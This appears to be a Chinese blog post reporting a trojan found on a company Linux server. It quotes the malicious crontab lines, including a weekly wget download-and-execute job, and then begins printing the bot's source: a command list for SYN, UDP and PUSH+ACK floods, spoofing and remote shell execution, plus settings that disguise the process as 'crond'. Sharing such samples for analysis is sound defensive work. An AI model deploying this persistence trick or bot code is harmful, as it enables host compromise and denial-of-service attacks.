前几天公司服务器被添加了一木马恶意程序,该程序一运行便对外发起了大量的连接,导致整个内网瘫痪掉,该木马注入的方式非常简单,只是在Linux crond定时器里加入以下任务:
[root@localhost tmp]# crontab -l
* * * * * /root/.zxc >/dev/null 2>&1
@weekly wget -q -O /tmp/.a;chmod +x /tmp/.a;sh /tmp/.a >/dev/null 2>&1
从指定网站下载相应的sh 脚本代码并运行,再下载木马程序源代码在本机编译执行,不断地对外发送数据包,有兴趣的朋友可以研究一下,看看该木马是要干什么的
木马的程序代码如下:
/*
* !* SH uname -a *
* There are a number of commands that can be sent to the client: *
* TSUNAMI <target> <secs> = A PUSH+ACK flooder *
* PAN <target> <port> <secs> = A SYN flooder *
* UDP <target> <port> <secs> = An UDP flooder *
* UNKNOWN <target> <secs> = Another non-spoof udp flooder *
* NICK <nick> = Changes the nick of the client *
* SERVER <server> = Changes servers *
* GETSPOOFS = Gets the current spoofing *
* SPOOFS <subnet> = Changes spoofing to a subnet *
* DISABLE = Disables all packeting from this bot *
* ENABLE = Enables all packeting from this bot *
* KILL = Kills the knight *
* GET <http address> <save as> = Downloads a file off the web *
* VERSION = Requests version of knight *
* KILLALL = Kills all current packeting *
* HELP = Displays this *
* IRC <command> = Sends this command to the server *
* SH <command> = Executes a command *
* Remember, all these commands must be prefixed by a ! and the nickname that *
* you want the command to be sent to (can include wildcards). There are no *
* spaces in between the ! and the nickname, and there are no spaces before *
* the ! *
* *
* - contem on efnet *
*******************************************************************************/
////////////////////////////////////////////////////////////////////////////////
// EDIT THESE //
////////////////////////////////////////////////////////////////////////////////
#define STARTUP // Start on startup?
#undef IDENT // Only enable this if you absolutely have to
#define FAKENAME "crond" // What you want this to hide as
#define CHAN "#bsd" // Channel to join
#define KEY "routers" // The key of the channel
#define IRCPORT "6667"